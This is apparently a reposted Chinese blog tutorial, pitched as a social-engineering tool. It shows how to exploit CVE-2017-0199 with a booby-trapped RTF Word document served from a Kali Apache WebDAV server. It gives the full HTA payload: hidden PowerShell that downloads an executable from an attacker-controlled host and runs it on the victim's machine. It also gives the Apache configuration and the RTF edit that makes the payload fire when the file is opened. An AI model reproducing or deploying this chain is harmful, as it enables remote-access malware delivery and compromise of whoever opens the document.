CVE-2017-0199 Kali做服务器 远控结合 Doc社工神器

内容简介：CVE-2017-0199 Kali做服务器 远控结合 Doc社工神器

Apache利用的是kalia

Kali下2个路径

web 路径 /var/www/html

apace 配置文件路径 /etc/apache2/apache2.conf

准备文件2个

1：poc

POC的内容：

<script>
poc=new ActiveXObject("WScript.Shell");
poc.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://ip_url/Atask.exe\', \'c:/windows/temp/Atask.exe\'); c:/windows/temp/Atask.exe', 0);window.close();
</script>

2：word 文档

随意 例如： a.docx

一：KaLi  开启DAV

a2enmod dav 
a2enmod dav_fs 
a2enmod dav_lock 
a2enmod headers

service apache2 restart

二：Kali服务器上操作

mv a.docx /var/www/html/a.rtf

三:本机电脑客户端操作

 新建word => 插入 => 对象 -> 文件名字 http://ip/a.rtf 勾选 连接到文件
保存成 rtf文件 （b.rtf）

四：Kali服务器上 删除 /var/www/html/a.rtf 文件，把一开始准备的 poc 复制成 a.rtf

mv poc /var/www/html/a.rtf

之后 修改Apache配置文件 vim /etc/apache2/apache2.conf

增加如下内容：

<Directory /> 
Dav on 
</Directory>

<Directory /var/www/html/ms/> 
Header set Content-Type "application/hta" 
</Directory>

保存 service apache2 restart

五:客户端

用文本编辑器 打开 b.rtf 找到：
`\object\objautlink\rsltpict`

替换为
`\object\objautlink\objupdate\rsltpict`：

保存。。。制作完成

以上就是本文的全部内容，希望对大家的学习有所帮助，也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

• MySQL 优化神器
• ppt 神器 reveal
• 基准测试神器-JMH
• 终端复用神器Tmux
• 揭秘Kaggle神器xgboost
• 研发辅助神器——Jmock实践

本站部分资源来源于网络，本站转载出于传递更多信息之目的，版权归原作者或者来源机构所有，如转载稿涉及版权问题，请联系我们。